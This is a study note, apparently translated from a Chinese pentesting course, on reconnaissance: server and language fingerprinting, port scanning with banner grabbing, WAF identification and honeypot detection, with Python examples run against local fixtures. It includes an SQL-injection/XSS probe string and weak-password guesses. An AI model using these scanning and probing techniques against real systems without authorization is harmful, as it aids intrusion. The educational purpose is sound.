Preface
I am a beginner who has been learning cybersecurity for two years, and I realised I had never studied it systematically, so I decided to go through Xiaodi's course and combine my own understanding with it, presenting it as text plus screenshots. Having watched it, I really think Xiaodi's course is yyds (the GOAT)! (I watched the 2024 videos.)
Learning content
What this session covers:
1. Getting to know middleware (web servers, application servers) and database types
2. Getting to know WAFs
3. What is port scanning? Why do port scanning?
4. What is a honeypot? How to set one up? How to avoid stepping into one?
Day 15: Host architecture & honeypot identification & WAF identification & port scanning & protocol identification & service security
Course link: 【小迪安全】全栈网络安全 | 渗透测试 | 高级红蓝对抗 V2024最新版 (完)_哔哩哔哩_bilibili
Let's begin
Knowledge point one: middleware and databases
When we are about to pentest a website, identifying its middleware and database lets us decide on an attack path and an approach. If the site uses MySQL, shouldn't the SQL we craft follow MySQL syntax? If the site is written in Java, a PHP webshell we upload won't execute, will it? If the site runs RuoYi, can't we just search for that system's N-day vulnerabilities?
The answer to all of these: of course!!!
Some readers may not know what middleware is:
It's simple. An example: the XiaoPi panel (phpStudy) is a web server, while RuoYi OA or a blog system is an application server; in this course both count as middleware. (Strictly speaking, "middleware" in pentest jargon usually means the web/application server layer, such as Apache, Nginx, IIS or Tomcat, while RuoYi or a blog CMS is an application deployed on top of it. What matters for us is that each layer has its own fingerprints and its own known vulnerabilities.) What is a database? The place where data is stored, for example MySQL. (Yes, you can store data without a database, but nobody does it that way; don't ask, it's "convention".)
So how do we identify a site's stack and collect this information to plan our attack?
Is this method complicated?
Streamer, streamer, is there a method that is easy and actually works?
There is, there is!!!
Method one: observe the packets
Capture traffic with Burp Suite (BP) or another proxy and look at the response headers, above all the Server field (X-Powered-By and the session cookie name are just as telling, because they give away the language):
Never seen that value before? Just search it; a quick Baidu (or Google) search will tell you what it is.
That's it.
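As an added example (my own code, not from the course), here is the "look at the headers" step done programmatically: it parses a raw HTTP response and infers the web server and the back-end language from the Server header, X-Powered-By, X-AspNet-Version and the session cookie name. The fingerprint tables are a small illustrative subset I chose for this example, and the four responses are constructed, not captured from any real site.

```python
import re

# Illustrative fingerprint tables assumed for this example (my own subset, not the
# course's); real fingerprinting tools carry far larger lists. Order matters: the
# more specific key ("apache-coyote") must come before the generic one ("apache").
SERVER_HINTS = {
    "nginx": "nginx", "apache-coyote": "Tomcat (Coyote connector)", "apache": "Apache httpd",
    "microsoft-iis": "IIS", "jetty": "Jetty", "openresty": "OpenResty",
    "litespeed": "LiteSpeed", "cloudflare": "Cloudflare edge (origin hidden)",
}
POWERED_BY_HINTS = {"php": "PHP", "asp.net": "ASP.NET", "express": "Node.js (Express)",
                    "servlet": "Java (Servlet)"}
COOKIE_HINTS = {
    "phpsessid": "PHP", "jsessionid": "Java", "asp.net_sessionid": "ASP.NET",
    "ci_session": "PHP (CodeIgniter)", "laravel_session": "PHP (Laravel)",
    "connect.sid": "Node.js (Express)", "csrftoken": "Python (Django)",
}


def parse_headers(raw):
    """Split a raw HTTP response into (status code, [(name_lower, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return status, headers


def fingerprint(raw):
    """Infer web server and language from one response; every guess carries its evidence."""
    _, headers = parse_headers(raw)
    found = {"web server": [], "language": [], "notes": []}
    for name, value in headers:
        lv = value.lower()
        if name == "server":
            for key, label in SERVER_HINTS.items():
                if key in lv:
                    found["web server"].append(f"{label} <- Server: {value}")
                    break
            m = re.search(r"php/([\d.]+)", lv)  # e.g. "Apache/2.4 (Win64) PHP/7.4.3"
            if m:
                found["language"].append(f"PHP {m.group(1)} <- Server: {value}")
        elif name == "x-powered-by":
            for key, label in POWERED_BY_HINTS.items():
                if key in lv:
                    found["language"].append(f"{label} <- X-Powered-By: {value}")
                    break
        elif name == "x-aspnet-version":
            found["language"].append(f"ASP.NET {value} <- X-AspNet-Version")
        elif name == "set-cookie":
            cookie = lv.split("=", 1)[0].strip()
            if cookie in COOKIE_HINTS:
                found["language"].append(f"{COOKIE_HINTS[cookie]} <- cookie name {cookie}")
    if not found["web server"]:
        # Server is easy to strip or fake; a CDN/WAF in front also hides it. The
        # session cookie name usually survives, so it is the more reliable hint.
        found["notes"].append("no recognisable Server header: stripped, or a CDN/WAF in front")
    return found


# Constructed responses for the demo (not captured from any real site).
PHP_SITE = (
    "HTTP/1.1 200 OK\r\nServer: nginx/1.18.0\r\nX-Powered-By: PHP/7.4.33\r\n"
    "Set-Cookie: PHPSESSID=3f9a; path=/\r\nContent-Type: text/html\r\n\r\n<html>"
)
JAVA_SITE = ("HTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\n"
             "Set-Cookie: JSESSIONID=0A1B; Path=/; HttpOnly\r\n\r\n")
NET_SITE = (
    "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/10.0\r\nX-Powered-By: ASP.NET\r\n"
    "X-AspNet-Version: 4.0.30319\r\nSet-Cookie: ASP.NET_SessionId=q7z; path=/\r\n\r\n"
)
HIDDEN_SITE = "HTTP/1.1 200 OK\r\nCF-RAY: 8a1b2c3d4e5f-HKG\r\nSet-Cookie: JSESSIONID=77; Path=/\r\n\r\n"

if __name__ == "__main__":
    for label, raw in [("php", PHP_SITE), ("java", JAVA_SITE), ("net", NET_SITE), ("hidden", HIDDEN_SITE)]:
        print(label, fingerprint(raw))
```

The last sample is the case to remember: no Server header at all (a CDN in front), yet the JSESSIONID cookie still says Java, so the payload you prepare should be a JSP/Java one, not PHP.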
Method two: a browser plugin
Method three: a cyberspace search engine, for example Yingtu (鹰图), 360 (Quake) or FOFA
Summary:
Streamer, what if I collect all this information and don't know what to do with it? Easy: if you can't use it, ask an AI. DeepSeek, the pride of China~
These basic concepts are really simple. If you don't understand something, just paste it into an AI and ask: what is this thing? What vulnerabilities does it have? (Answer me or I'll break your leg!) That works fine~
Knowledge point two: port scanning
What is port scanning, really, and why are the explanations online so complicated?
It's simple: you know what an IP is, you know what a port is, and you know how many ports there are. Put them together and you know what port scanning is~
For example, if the IP is 192.168.121.14, then scanning 192.168.121.14 on ports 1-65535, that is, every TCP port, is port scanning.
Why do port scanning? What is the underlying logic that lets port scanning turn into vulnerability discovery?
It's simple; think of it as "default port" logic. Have you used Burp (BP) to capture packets? Burp's proxy listens on port 8080 by default, and that is exactly the idea of a service's default port. Many services, web applications and configurations have a corresponding default port, and many of those services have N-day vulnerabilities. That is how port scanning leads to vulnerability scanning: port scan -> identify the service and version -> look up its known vulnerabilities.
Can these service ports be changed? Of course!!! But will anyone actually change them?
Most won't, so we can go by these "conventional" ports. It is these conventions that make port scanning so productive.
(Note: are ports 80 and 443 necessarily HTTP/HTTPS? Not necessarily!!! They can be changed!!!)
Port scanning by itself relies only on industry "convention" to identify services quickly. If you want to determine a port's service accurately you have to gather evidence from several sides: grab the banner, look at the protocol handshake, and probe it with the suspected protocol, instead of just trusting the port number.
(But honestly, most people in the industry don't change the default ports, so testing by the experience of those who came before works~)
Some common ports and the vulnerabilities typically found on them~
Streamer, manually identifying the service on each port is still too hard, is there an easier way?
There are three ways:
Method one: cyberspace search engine. Enter the IP and read the ports straight off the result~
Method two: actively scan all the ports with a tool
To be honest, this tool isn't very good and has quite a few bugs, but it's convenient for a demo~
Status OPEN means the port is open, Closed means the port is closed
Why do closed ports show up in a scan at all?
Case one:
When the tool scans, the connection attempt got an answer, so the port is known to exist. But the server can still refuse access through its firewall configuration. (In nmap's vocabulary a port that answers with a RST is "closed": the host is reachable but nothing is listening there. A port that gives no reply at all because a firewall drops the packets is "filtered".)
So you know it exists but can't get in. Analogy: you can see the door in front of you, but you don't have the key, so you can't go through it.
Case two:
It may also be an internal-network setup: a reverse proxy lets us reach the service, but the port's real entrance cannot be found. Analogy:
Naruto makes shadow clones; you can find a clone and attack it, but that does no damage to the original~
Pick the scan profile you want; underneath these are really just nmap command lines, which you can look up yourself. Then start the scan~
If you find this tool too slow, use Masscan instead.
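To make the "default port vs. what is actually listening" point and the open/closed/filtered states concrete, here is an added example (my own code, not the course's tool and not nmap): a minimal TCP connect scanner that reports each port's state, grabs the banner, and only falls back to the port-number convention when the service did not identify itself. So that it runs offline it starts two throwaway local listeners as constructed fixtures (a fake SSH banner and a fake HTTP server); the DEFAULT_PORTS table is a small subset I chose for the demo.

```python
import socket
import threading

# The "conventional" ports the course refers to: what you expect on a port before you
# verify it. Subset assumed for this example.
DEFAULT_PORTS = {
    21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 80: "http", 443: "https",
    1433: "mssql", 3306: "mysql", 3389: "rdp", 6379: "redis", 8080: "http-alt",
}


def probe(host, port, timeout=1.0):
    """TCP connect probe of one port; returns (state, banner).

    state follows nmap's vocabulary:
      open     - handshake completed, something is listening
      closed   - RST came back: host reachable, nothing listening there
      filtered - no answer at all (or ICMP unreachable): typically a firewall drop
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except ConnectionRefusedError:
        s.close()
        return "closed", b""
    except OSError:  # timeout, EHOSTUNREACH, ENETUNREACH, ...
        s.close()
        return "filtered", b""
    banner = b""
    try:
        try:
            banner = s.recv(256)  # SSH/FTP/SMTP/MySQL speak first ...
        except socket.timeout:
            pass
        if not banner:  # ... HTTP waits for the client, so ask it something
            s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
            banner = s.recv(256)
    except OSError:
        pass
    finally:
        s.close()
    return "open", banner


def guess_service(port, banner):
    """Name the service from what it said; otherwise fall back to the port-number convention."""
    b = banner.upper()
    if b.startswith(b"SSH-"):
        return "ssh (banner)"
    if b.startswith(b"HTTP/"):
        return "http (banner)"
    if b.startswith(b"220") and b"FTP" in b:
        return "ftp (banner)"
    if b.startswith(b"220") and b"SMTP" in b:
        return "smtp (banner)"
    return DEFAULT_PORTS.get(port, "unknown") + " (assumed from port number)"


def scan(host, ports, timeout=1.0):
    """Probe each port; returns {port: (state, service)}."""
    results = {}
    for port in ports:
        state, banner = probe(host, port, timeout)
        results[port] = (state, guess_service(port, banner) if state == "open" else "-")
    return results


def fake_service(banner=b"", http_reply=b""):
    """Throwaway local listener so the demo runs offline (constructed fixture, not a
    real daemon). Sends `banner` on connect, or answers the first request with `http_reply`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                if banner:
                    conn.sendall(banner)
                else:
                    conn.settimeout(5)
                    try:
                        conn.recv(1024)
                        conn.sendall(http_reply)
                    except OSError:
                        pass

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def unused_port():
    """A port nothing listens on, to show the 'closed' state."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    ssh_port = fake_service(banner=b"SSH-2.0-OpenSSH_9.2p1 Debian-2\r\n")
    web_port = fake_service(http_reply=b"HTTP/1.0 200 OK\r\nServer: nginx\r\n\r\n")
    for port, (state, service) in scan("127.0.0.1", [ssh_port, web_port, unused_port()]).items():
        print(f"{port:>5}/tcp  {state:<8}  {service}")
```

Both fake services sit on random high ports, so the port-number table alone would have called them "unknown"; the banner is what identifies them. That is the whole reason the course says not to trust 80/443 (or any port) blindly. Against real targets, nmap -sV or Masscan plus a banner grab do this at scale.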
Summary:
Port scanning means probing the service on each port and checking whether that service has vulnerabilities. The most common approach is to hit N-day vulnerabilities rather than dig for new ones. (Why? Because we're weak. If you're strong enough you can find 0-days in the service on every port, but early on just try the N-days~) The hard part of port scanning is not identifying the service on a port but finding the real IP~ If the target is behind a CDN, how do you get around it? Next article, hehe~
Knowledge point three: the WAF (web application firewall)
WAF explained:
A Web Application Firewall (also called a website application-level intrusion prevention system; abbreviated WAF). Using the internationally accepted definition: a web application firewall is a product that protects web applications specifically, by enforcing a set of security policies on HTTP/HTTPS traffic.
WAF categories:
Cloud WAF: 百度安全宝 (Baidu Anquanbao), 阿里云盾 (Alibaba Cloud Shield), 长亭雷池 (Chaitin SafeLine), Huawei Cloud, Amazon (AWS WAF), etc.
Hardware WAF: commercial products from 绿盟 (NSFOCUS), 安恒 (DBAPPSecurity), 深信服 (Sangfor), 知道创宇 (Knownsec), etc.
Software WAF: code-level WAFs such as 宝塔 (BT Panel), 安全狗 (SafeDog), D盾 (D-Shield)
Hand-written WAF rules, to block injection and the like; usually hard-coded in the application itself
Only once you can recognise a WAF can you plan a bypass strategy for that specific WAF. Haha, bypassing WAFs is a long road, so first understand what a WAF is and learn to recognise them.
At the very least, when you ask for help you'll know which WAF you're up against~
Strength of protection: cloud WAF > hardware WAF > software WAF = hand-written rules (hard to say; it depends on the coding ability of whoever wrote the rules~)
So how do you find out which WAF a site uses???
There is, there is: three ways to quickly identify a site's WAF
Method one: a cyberspace search engine identifies the WAF. Haha, search engines again, is there anything they can't identify? Take 360 as an example:
Enter the domain of the site you're testing and the engine shows the result you want
Method two: tools, for example identYwaf
This tool collects the block pages (the warning screens) that WAF products return and identifies the WAF product from features of those pages
It's also simple to use: it needs a Python environment, and you give it the domain
There is another tool that is just as easy; the difference is that it reports one definite WAF name rather than a list of probabilities
Method three: image recognition
Save the block-page screenshot and run it through Google's reverse image search
But let me remind everyone (haha, myself included). Take this edu site as an example:
On the same site, we ran a tool and an AI for feature recognition
The tool said 360 WAF was the most likely and gave Alibaba Cloud WAF no chance at all
The AI said Alibaba Cloud WAF
What does that tell us? Anything, any tool, is made by people, and once a thing is made by people, its identification accuracy and its features are limited by the knowledge of whoever built it. Take that one step further: the truly useful, truly powerful tools can only be written by yourself, because those fit you best~
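Following the author's advice to write your own tool, here is an added example (my own code, not identYwaf or any tool from the course) of how WAF identification works underneath: send one benign request and one that looks like an attack, then compare the two responses. A WAF normally answers the second with a block page (a 403/405/406 status, a different Server header, vendor text in the body), and a short signature table names the product. The signatures below are a small illustrative subset I chose, and the four responses are constructed, not captured from any real site.

```python
# Signature subset assumed for this example: a few well-known block-page/header markers.
# My own illustrative list, not the course's; tools like wafw00f/identYwaf keep far larger sets.
WAF_SIGNATURES = [
    # (product,            header name,           header substring, body substring)
    ("Cloudflare",         "cf-ray",              "",               ""),
    ("Cloudflare",         "server",              "cloudflare",     ""),
    ("Baidu Yunjiasu",     "server",              "yunjiasu",       ""),
    ("360 WangZhanWeiShi", "x-powered-by-360wzb", "",               ""),
    ("Safedog",            "server",              "safedog",        ""),
    ("Safedog",            "x-powered-by",        "waf/2.0",        ""),
    ("Alibaba Cloud WAF",  "",                    "",               "errors.aliyun.com"),
]
BLOCK_STATUSES = {403, 405, 406, 419, 429, 501}


def parse_response(raw):
    """Raw HTTP response -> (status, {header_lower: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return status, headers, body


def match_signatures(headers, body):
    """Return the (de-duplicated) list of products whose signature matches."""
    hits = []
    lbody = body.lower()
    for product, hname, hsub, bsub in WAF_SIGNATURES:
        if hname:
            value = headers.get(hname)
            if value is None or hsub not in value.lower():
                continue
        if bsub and bsub not in lbody:
            continue
        if product not in hits:
            hits.append(product)
    return hits


def detect_waf(baseline_raw, triggered_raw):
    """Compare a benign request's response with the response to a malicious-looking one.

    The probe that produces `triggered_raw` would be a request such as
    GET /?id=1' AND 1=1 UNION SELECT 1--<script>alert(1)</script>
    which any rule-based WAF should block, while the benign request passes.
    """
    b_status, b_headers, b_body = parse_response(baseline_raw)
    t_status, t_headers, t_body = parse_response(triggered_raw)
    blocked = t_status in BLOCK_STATUSES and b_status not in BLOCK_STATUSES
    # Some WAFs block "politely" with a 200 and a completely different page.
    if not blocked and b_status == t_status and \
            abs(len(t_body) - len(b_body)) > max(200, len(b_body) // 2):
        blocked = True
    return {
        "blocked": blocked,
        "products": match_signatures(t_headers, t_body),
        "status": (b_status, t_status),
        "server": (b_headers.get("server"), t_headers.get("server")),
    }


# Constructed responses for the demo (not captured from any real site).
BASELINE = ("HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n\r\n"
            "<html><body>Welcome, product list...</body></html>")
CF_BLOCK = ("HTTP/1.1 403 Forbidden\r\nServer: cloudflare\r\nCF-RAY: 8a1b2c3d4e5f-HKG\r\n\r\n"
            "<html><title>Attention Required!</title>Sorry, you have been blocked</html>")
ALIYUN_BLOCK = ("HTTP/1.1 405 Method Not Allowed\r\nServer: Tengine\r\n\r\n"
                "<html><body>... https://errors.aliyun.com/images/TB1 ... 405</body></html>")
NO_WAF = ("HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n\r\n"
          "<html><body>Welcome, product list... (no results)</body></html>")

if __name__ == "__main__":
    for name, triggered in [("cloudflare", CF_BLOCK), ("aliyun", ALIYUN_BLOCK), ("none", NO_WAF)]:
        print(name, detect_waf(BASELINE, triggered))
```

The "blocked but no product matched" outcome is the interesting one in practice: it tells you there is a WAF (or hand-written rules in the application) that your signature list does not know, which is exactly the situation the author ran into with the edu site. The author's point stands: extend the table with what you actually observe, because the tool is only as good as its list.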
Knowledge point four: understanding honeypots, and setting one up
Honeypot explained: a honeypot is a security threat-detection technique. Its essence is luring and deceiving attackers, and it produces value by recording their attack activity. Security researchers can infer attackers' intent and methods by analysing honeypot logs. Attackers, for their part, can use honeypot-identification techniques to discover and avoid honeypots, so it is worth studying honeypot identification from the red team's point of view.
Honeypot classification: by the degree of interaction between honeypot and attacker, honeypots fall into three categories: low-interaction, medium-interaction and high-interaction. They can also be classified by the target they imitate, for example database honeypots, industrial-control honeypots, IoT honeypots, web honeypots, and so on.
Low-, medium- and high-interaction simply describe how elaborate the honeypot is. A low-interaction honeypot may be nothing but a login box, with nothing behind it once you log in. A high-interaction honeypot is indistinguishable from a normal website: it has a database, web pages, middleware, a WAF and an admin page, and lets you keep pentesting it, all the while collecting your IP address and phone number and tempting you to download the trojaned files it hosts. Its main purpose is to waste your time.
In fact you don't need all these odd concepts. Just think of it as a phishing site set up by the defenders, except that the targets are red teamers, hackers and penetration testers rather than ordinary users~ The most annoying part is how much of your time it can waste, because after all it's a honeypot, and there isn't much point in taking it down. But is it really useless? That's not absolute either~ haha. No need to go into detail here; understand the basics and be able to identify honeypots.
First, from the blue team's perspective: deploy a honeypot (article link)
It gets set up quickly~
This automatically deploys the honeypot on a few ports for you, and you can try accessing it.
Let's simulate a weak-password attack~
admin root
admin 123456
... ...
Then, in our honeypot management panel:
You can see the visiting IP (I am attacking myself with my own IP~ hehe)
You can see exactly what the attacker typed
So how do we avoid stepping into honeypots in daily testing?
The more rigorous way is JS reverse engineering: a honeypot has to collect your information, which means sending traffic somewhere, and the code that does that forwarding is usually in the page's JS. You can read the JS to check, but that takes too much time.
Is there a simple and quick way?
There are three, hahaha
Method one: cyberspace search engine, hahaha, me again. The engine can identify honeypots too, for example:
Method two: browser plugin
If the site is a honeypot it raises an alert automatically.
Method three: GitHub tool recommendation: https://github.com/360quake/quake_rs
But you need a 360 Quake key; simply put, you need to become a member~
The principle of honeypot identification won't be elaborated here; those interested can look into it themselves.
Principle of honeypot identification: "Who is the fish and who is the bait? A summary of honeypot identification methods from the red team's perspective"
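As an added example (my own code, not from the course or the linked article) of the JS check described above, done statically instead of by hand: pull the page once, list every script source and every URL that the inline JS talks to, and flag the ones that go to hosts unrelated to the site, in particular JSONP-style requests (a callback= parameter) aimed at third-party sites, and scripts that read document.cookie or fingerprint the browser and then post somewhere else. The heuristics and the two sample pages are my own constructions; the hostnames in them are made up.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristics assumed for this example (mine, not the course's). A honeypot page tends to:
# load scripts from unrelated hosts, fire JSONP-style requests at other sites to learn
# which accounts you are logged in to, and ship cookies/fingerprint data off-site.
JSONP_RE = re.compile(r"[?&](?:callback|cb|jsonp)=", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
EXFIL_RE = re.compile(
    r"document\.cookie|localStorage|navigator\.plugins|navigator\.hardwareConcurrency"
    r"|getImageData|toDataURL", re.I)


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from an HTML page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None  # list of data chunks while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)


def site_domain(host):
    """Crude registrable-domain guess: the last two labels (good enough for this demo)."""
    return ".".join(host.lower().split(".")[-2:])


def is_foreign(url, site_host):
    host = urlparse(url).hostname or ""
    return bool(host) and site_domain(host) != site_domain(site_host)


def honeypot_indicators(html, site_host):
    """Return a list of (kind, detail) findings for JS that talks to hosts outside the site."""
    col = _ScriptCollector()
    col.feed(html)
    findings = []
    for src in col.external:
        if is_foreign(src, site_host):
            findings.append(("third-party script", src))
    for body in col.inline:
        for url in URL_RE.findall(body):
            if not is_foreign(url, site_host):
                continue
            if JSONP_RE.search(url):
                findings.append(("jsonp probe to other site", url))
            elif EXFIL_RE.search(body):
                findings.append(("client data sent off-site", url))
            else:
                findings.append(("request to other site", url))
    return findings


# Constructed sample pages (hostnames are invented; .example is a reserved TLD).
SAMPLE_HONEYPOT = """<html><head>
<script src="/static/login.js"></script>
<script src="https://cdn.example-stat.net/fp.js"></script>
<script>
var img = new Image();
img.src = "https://api.example-social.com/user/info?callback=jsonp_cb1";
fetch("https://collect.example-bait.net/r", {method: "POST",
      body: document.cookie + "|" + navigator.plugins.length});
</script></head><body><form>login</form></body></html>"""
SAMPLE_CLEAN = ('<html><head><script src="/static/app.js"></script>'
                '<script>var ready = true;</script></head><body></body></html>')

if __name__ == "__main__":
    for kind, detail in honeypot_indicators(SAMPLE_HONEYPOT, "login.target.example"):
        print(f"[{kind}] {detail}")
    print("clean page:", honeypot_indicators(SAMPLE_CLEAN, "login.target.example"))
```

Any single finding can be innocent (a CDN-hosted library, an analytics tag), so treat the output as a reason to read that script before you keep going, not as proof. The JSONP probe to an unrelated site on a login page is the one that should make you stop immediately.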
Summary
This article walks through a concrete information-gathering process for a website. What is covered above is the most common information to collect. Once we have these things clear, we can be more skilful when penetrating a site. Lastly, I wish everyone a happy and joyful day!
Disclaimer
The content contained in this article is for educational and research purposes only, aiming to raise awareness of information security and help users understand the importance of network security protection.
Any penetration testing techniques, tools, or methods mentioned in the article are for legitimate authorized security research and testing purposes only. Ensure that you have obtained explicit authorization from the owner of the relevant system or network before conducting any penetration testing or security testing.
The author of this article assumes no responsibility for any illegal activities, damages, or other adverse consequences arising from the use of the content of this article. Readers should ensure compliance with all applicable laws and regulations before implementing any technology.
The content of this article does not support or encourage any form of malicious attack, unauthorized intrusion, or cybercrime.
The content of this article is limited to educational purposes and may not be used in any way for unauthorized network security attacks or disruptive behavior.